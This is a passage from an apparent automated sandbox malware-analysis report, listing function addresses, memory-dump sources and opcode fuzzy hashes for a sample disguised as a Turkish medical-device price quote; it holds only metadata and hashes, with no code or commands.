                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 497f8d485395582077a8055ef0d3c219e804c1f7d76aff534518dbaa8e00a4d9
                                                                                                    • Instruction ID: 8d0f9dba9ace96491af45d381679a807d911ea51460221a3b20117e186ecaf80
                                                                                                    • Opcode Fuzzy Hash: 497f8d485395582077a8055ef0d3c219e804c1f7d76aff534518dbaa8e00a4d9
                                                                                                    • Instruction Fuzzy Hash: 2FF030747541218FC754976CC858A7E77EA9FC9A51B1840BAE60ACB371CFB0DC028B90
                                                                                                    Function 0742E2D0 Relevance: .0, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9f3db076e22eb0e7111da47cf4aeb2893c62b2b8ad47e15c7c7fbfd565c9df24
                                                                                                    • Instruction ID: ac87b15d78eaa76172af0cce8a0f429445b4951803a812d05e093984ebeae53d
                                                                                                    • Opcode Fuzzy Hash: 9f3db076e22eb0e7111da47cf4aeb2893c62b2b8ad47e15c7c7fbfd565c9df24
                                                                                                    • Instruction Fuzzy Hash: AFF030743542218FC644976DC858A6E77DA9FC9A51B1440BAE609CB360CF70DC028790
                                                                                                    Function 074211F8 Relevance: .0, Instructions: 34COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 47be0cadaa8cc670e676f7df9d74280257b53805bd21ecbe00f9b9a7f12a92d8
                                                                                                    • Instruction ID: 97afc22a962b513524d3f7b30ceadd147bede8f7ea7903d379edf0b0b21b1ce0
                                                                                                    • Opcode Fuzzy Hash: 47be0cadaa8cc670e676f7df9d74280257b53805bd21ecbe00f9b9a7f12a92d8
                                                                                                    • Instruction Fuzzy Hash: 75F0E97064024DDFCB14EFA4E9457EEB774EF02314F1002ADD804A7210DBB19E01DB80
                                                                                                    Function 075C7D49 Relevance: .0, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7e3c90eb343fc9ab32506fdea351c1b2a80365cf3a41f51c0d8ed22491897341
                                                                                                    • Instruction ID: c0fe8a7e29cc062855716a3affba98d8230bbc3238ec5eed0b3e9b207cfde707
                                                                                                    • Opcode Fuzzy Hash: 7e3c90eb343fc9ab32506fdea351c1b2a80365cf3a41f51c0d8ed22491897341
                                                                                                    • Instruction Fuzzy Hash: B8F024B05DE2844ED39182A068043B47F22A78331AF08C5EFE0440FC8BC62B8843CA51
                                                                                                    Function 075CBBED Relevance: .0, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3dfa2935eedabf2bde0bc460b9f94296d280c4e1d26462403bed29348bddc2fb
                                                                                                    • Instruction ID: 96373cf84026cc181a33b83b9a0cd9a507304d404af0a5d47091cdec2304e59b
                                                                                                    • Opcode Fuzzy Hash: 3dfa2935eedabf2bde0bc460b9f94296d280c4e1d26462403bed29348bddc2fb
                                                                                                    • Instruction Fuzzy Hash: B2F0C974A111089FCB44EB98C491B9DBBB2BB89310F208559E409A7345CA31AD42DB91
                                                                                                    Function 075CAEEA Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e5d8e537991c009a8605f4f3e9689ea3f3f98c6b0a7b19c8cf87dde2c08ebebe
                                                                                                    • Instruction ID: 2e45fe02a1b2025c7ee1b1cf369654b4ba6ffa74e7870c0ef99ccff516aaaf35
                                                                                                    • Opcode Fuzzy Hash: e5d8e537991c009a8605f4f3e9689ea3f3f98c6b0a7b19c8cf87dde2c08ebebe
                                                                                                    • Instruction Fuzzy Hash: D2F09070A45385DFDF01DBB4CC5AAEDBB72BF46300F00C25AE622662D1C774481ACB51
                                                                                                    Function 0742B3B9 Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 04cbb264aed77f16de66a2f6dd1d187ec09de4d01368de5b2a51eea1b664e8ee
                                                                                                    • Instruction ID: 0dc16be340d55d1bbb26883cdb38aea9eabb221866f169806e0826189976d006
                                                                                                    • Opcode Fuzzy Hash: 04cbb264aed77f16de66a2f6dd1d187ec09de4d01368de5b2a51eea1b664e8ee
                                                                                                    • Instruction Fuzzy Hash: 3BE09275209310DFC7259B79E8004E37BF5EB4222134585AFD0568BA63CA39EC82C791
                                                                                                    Function 0742AAB7 Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 49ddb639acba5fe4cf4ebc6992855a1270f7dffe8886677ae06a916587a404d7
                                                                                                    • Instruction ID: 477c95086bef23cffaf5aa2b86e22210a94644cc9560e1c6d4eb25c79af3801f
                                                                                                    • Opcode Fuzzy Hash: 49ddb639acba5fe4cf4ebc6992855a1270f7dffe8886677ae06a916587a404d7
                                                                                                    • Instruction Fuzzy Hash: A0E0ED303092A19FCB1A462669259FF7BA28FC2220709407BE85BC3292CA104C17D791
                                                                                                    Function 075C9E5B Relevance: .0, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a0bc1327c5e040878f551ff342227d3d61bacd7c906b44c8f5069f4b9b69323b
                                                                                                    • Instruction ID: fd47f5e7b877ff2d1068b8338c568d8ae975438a28603262ec45c3ffd5c1262b
                                                                                                    • Opcode Fuzzy Hash: a0bc1327c5e040878f551ff342227d3d61bacd7c906b44c8f5069f4b9b69323b
                                                                                                    • Instruction Fuzzy Hash: CAF089A151938A8FD713CB7C8C516E97FB2BF43104F18499FC1D19B293C6254C0AC752
                                                                                                    Function 07429770 Relevance: .0, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b35ee072d4a830e5b0d75a1e089432c55a76beab9a5e30b210502868b89d1277
                                                                                                    • Instruction ID: b64ced56da0188895377017a0ef559ba3a0b9eae41fa3942bb0a214d04e9891a
                                                                                                    • Opcode Fuzzy Hash: b35ee072d4a830e5b0d75a1e089432c55a76beab9a5e30b210502868b89d1277
                                                                                                    • Instruction Fuzzy Hash: E0F0A770209351CFC31AAF3984544677BE5EF8720074588BFD1558B6A2CA75D842CB41
                                                                                                    Function 0742E278 Relevance: .0, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: afdc59c679617cd4edfc8362651ebe6549046ffdc79b1ee5aa53fa6b274d8dfa
                                                                                                    • Instruction ID: 539d21fff3ac18f76db8049e17037232bcfbd1e145af7fdd01d61de4c257876f
                                                                                                    • Opcode Fuzzy Hash: afdc59c679617cd4edfc8362651ebe6549046ffdc79b1ee5aa53fa6b274d8dfa
                                                                                                    • Instruction Fuzzy Hash: EFE09271B00A210B5708FBBFA8004ABF7EBAFC8610314C07EE10E87725EE30DD425684
                                                                                                    Function 0742EF90 Relevance: .0, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: da8482a7116df56cc5f91501e01f16538681c7325bbeea458c631b7031fd4c06
                                                                                                    • Instruction ID: a84761ffb72fed4e4f64ba13c994b1c5a43074e4a7a5a4d123e35f2b29a9364f
                                                                                                    • Opcode Fuzzy Hash: da8482a7116df56cc5f91501e01f16538681c7325bbeea458c631b7031fd4c06
                                                                                                    • Instruction Fuzzy Hash: 5CF0ED353604259FC718DB2ED858D5977E9EFC9A6171640BAF109CB372DE61DC02CB90
                                                                                                    Function 075CC0CA Relevance: .0, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4c05a77acf0f44606f8612652bb32a218512f7687139c6e0aff83f77901bfa74
                                                                                                    • Instruction ID: 3d1976f72cb7ce537ed89456fcb71689476df2d1ad4f2259d72a4a52b57d3383
                                                                                                    • Opcode Fuzzy Hash: 4c05a77acf0f44606f8612652bb32a218512f7687139c6e0aff83f77901bfa74
                                                                                                    • Instruction Fuzzy Hash: 4EE02BB011C248DFD320C69968112F83B69FB47350F00899FE84FEA645C9118B4043B7
                                                                                                    Function 0742EFD1 Relevance: .0, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 78e4ba902e52e5adf4efe5a0c57c3afd5c44ac592e5263f7bbd9c87c3c8f0277
                                                                                                    • Instruction ID: 8ee910ad32fdfcb4d4d13838ddee12c3a77388bcccbfa1bb6fcd68f7d5d9d87b
                                                                                                    • Opcode Fuzzy Hash: 78e4ba902e52e5adf4efe5a0c57c3afd5c44ac592e5263f7bbd9c87c3c8f0277
                                                                                                    • Instruction Fuzzy Hash: BFE0DF6610E3E18FEB234632A8A13CA7FA05B62150F9E85CBE0C1CA1D2C0490D4AC396
                                                                                                    Function 075C20C8 Relevance: .0, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 722128383b436aef2bee9b1484ba8a2f2213c17eb4c2d50e22ae047d31fc0ac1
                                                                                                    • Instruction ID: d8f70e17fff17476b7eee372f37478045764ebc17af9257f1c51a0f4c988f797
                                                                                                    • Opcode Fuzzy Hash: 722128383b436aef2bee9b1484ba8a2f2213c17eb4c2d50e22ae047d31fc0ac1
                                                                                                    • Instruction Fuzzy Hash: D9E0CD627042544FE3015FB779163F67BA9EF46519B068067E545CB2C2CA1CCD439391
                                                                                                    Function 07423459 Relevance: .0, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ef2c16583e69b5fb2e791ce2b963ee22271e1c6a394ea88073dc54917684ff34
                                                                                                    • Instruction ID: b877103568244a7a4f007c6f03ecea748000d2159be4d9eb2aa83b985920911f
                                                                                                    • Opcode Fuzzy Hash: ef2c16583e69b5fb2e791ce2b963ee22271e1c6a394ea88073dc54917684ff34
                                                                                                    • Instruction Fuzzy Hash: C8E092B2A10259ABCB11AEA1EC4DBDBBF78EB44361F404076ED0583151E7B58069C6A1
                                                                                                    Function 075C9D82 Relevance: .0, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3fb7f630001fc6249d7200ad343d88e206ffc53e4682d0c4d525196be82e750d
                                                                                                    • Instruction ID: dc53284a7dc57584d1678e1608183ac504b97343f5e50c1893478deb50a55d0f
                                                                                                    • Opcode Fuzzy Hash: 3fb7f630001fc6249d7200ad343d88e206ffc53e4682d0c4d525196be82e750d
                                                                                                    • Instruction Fuzzy Hash: D5E08CA037C004CFC6C8B5E4A80D7F977A27B83321F040C6ED00B66A8DDF66A82041D3
                                                                                                    Function 0742E268 Relevance: .0, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5da9b4a6002959d65c3f73c41d5f567e55a2e300aa90f12c011358c6706afeb1
                                                                                                    • Instruction ID: 207c263067c3685a7262cf377db41a9ecaa4b1896c60f0ce68d6117bc7aa69c9
                                                                                                    • Opcode Fuzzy Hash: 5da9b4a6002959d65c3f73c41d5f567e55a2e300aa90f12c011358c6706afeb1
                                                                                                    • Instruction Fuzzy Hash: 8BE0D8716087A10FD71AD63A68114E6BFF66DC5200318C29FD44ACB696DA6459428784
                                                                                                    Function 075C0DE8 Relevance: .0, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1bc7cfb42c948a1348044b809e2a000f61f39c6b43776e48fd060e608b9b586e
                                                                                                    • Instruction ID: 03fcdfb0474b0ea51ed467a3ed776b1fab47d2338f5887772dbc490e5be5be19
                                                                                                    • Opcode Fuzzy Hash: 1bc7cfb42c948a1348044b809e2a000f61f39c6b43776e48fd060e608b9b586e
                                                                                                    • Instruction Fuzzy Hash: 45E0C2B1804608DECB51EF64D9486997FE4BB12219F01C1AEE85DCB0A2E675C299DB81
                                                                                                    Function 0742AAC8 Relevance: .0, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c84a1af32092b9f855c66eb25fd8729217f60563d5a5ca9c655864f8b0687458
                                                                                                    • Instruction ID: 422c65e6c0b5f1f2a1a9a89e57959e0421988da61d8a7df46551ab08ba052302
                                                                                                    • Opcode Fuzzy Hash: c84a1af32092b9f855c66eb25fd8729217f60563d5a5ca9c655864f8b0687458
                                                                                                    • Instruction Fuzzy Hash: 01D0C271301126874E58521BA918AFFB29A8FC5661748803FEC1BC3240DE10DC13E2E1
                                                                                                    Function 075CC091 Relevance: .0, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 62cd213702fc0313b459a3cb879fa3b2f44682b7a8b4588bc4b7844ec044019f
                                                                                                    • Instruction ID: 889709b2029731670f92c12dc72b2130af1fe1f2d0fac022bd22a1f25a100049
                                                                                                    • Opcode Fuzzy Hash: 62cd213702fc0313b459a3cb879fa3b2f44682b7a8b4588bc4b7844ec044019f
                                                                                                    • Instruction Fuzzy Hash: 3AE08CA122D688CEE710C5E868283FC3FA87B47321F004C5FD40E65642C96204404233
                                                                                                    Function 075C8140 Relevance: .0, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 151ae31f4aed8e07e856e122785045c86bf056c29ab84fe5ede74143020dce53
                                                                                                    • Instruction ID: b16aed4879fbaa093109b8f0018d7d36b9ae16fa3491ef7b2c45e5c938136384
                                                                                                    • Opcode Fuzzy Hash: 151ae31f4aed8e07e856e122785045c86bf056c29ab84fe5ede74143020dce53
                                                                                                    • Instruction Fuzzy Hash: 4EE092B42186428FD302DBA4C829766BBA1FF46204F14C89B94568B3A7CA35A80BC751
                                                                                                    Function 0742DE54 Relevance: .0, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 21417ae1910bf64d0ed016651a7bcfafe0b8e53a9cbdda4419f95ec87fea4fc7
                                                                                                    • Instruction ID: 400997c4f0191812a71a0bd0eb02b79cd2b9b93a2faf604da7a7699f3f214478
                                                                                                    • Opcode Fuzzy Hash: 21417ae1910bf64d0ed016651a7bcfafe0b8e53a9cbdda4419f95ec87fea4fc7
                                                                                                    • Instruction Fuzzy Hash: D3D02B37545030C2D6109915ACC17DA3341EBC4300FA98C5BE841D7144C85AE5575101
                                                                                                    Function 075CAE9B Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 93c6ccb6105a0097dbe6f39ac5dc6284c5b10c4e36f02f9d328333d90c95ff07
                                                                                                    • Instruction ID: eeb0b181e5f8b848fe3ba61ff304ba029667de9e4564257921d04d3a29dd9a4b
                                                                                                    • Opcode Fuzzy Hash: 93c6ccb6105a0097dbe6f39ac5dc6284c5b10c4e36f02f9d328333d90c95ff07
                                                                                                    • Instruction Fuzzy Hash: EDE09AB1C08685CFC70ACFB8C8A62A9FFB1BE43600F0885AFD05487116C3301856CB82
                                                                                                    Function 075C9D88 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3a47325e7d0b1284f86ff8e9d288892a162b5560d881086bd5eee213fec6b5a3
                                                                                                    • Instruction ID: ba7a708d74d2aeaef1bea3aae924dd65b8f7a46c4698a2a7efaa3c68247c6eab
                                                                                                    • Opcode Fuzzy Hash: 3a47325e7d0b1284f86ff8e9d288892a162b5560d881086bd5eee213fec6b5a3
                                                                                                    • Instruction Fuzzy Hash: 6FD0179023C104CFC6C8B5E8A80DBF972A67B83321F444C6E900BA678DDF66B82042D7
                                                                                                    Function 074211B8 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c0f67411673767870d4058775353a4d21051877164587fa4b6355ac845692b63
                                                                                                    • Instruction ID: aef47b09fedb83c2901d821ec74f934b3648e35428941d8541e55b25bae3b8e8
                                                                                                    • Opcode Fuzzy Hash: c0f67411673767870d4058775353a4d21051877164587fa4b6355ac845692b63
                                                                                                    • Instruction Fuzzy Hash: B2E086B0501289EFCB04FFB8E50575EB7B5EB45304F50466D940497250DBB05F40EB41
                                                                                                    Function 075CB059 Relevance: .0, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a673815a6b71c64e4be283ece9cfbeb00efd721154cdce65478c77de19f38274
                                                                                                    • Instruction ID: d9c5006a0c67a026543a6ba62e2b351bb24e95d33adcf0e33d487884855bb0ab
                                                                                                    • Opcode Fuzzy Hash: a673815a6b71c64e4be283ece9cfbeb00efd721154cdce65478c77de19f38274
                                                                                                    • Instruction Fuzzy Hash: 84D05E64B14108ABD708EEB19C556BE6AA3B7C9721F90C92DA90687384DD348D029691
                                                                                                    Function 075C0DF8 Relevance: .0, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a0111a4c5422bd193505c22581a108b9a77195c035e192733c74b510557edd9d
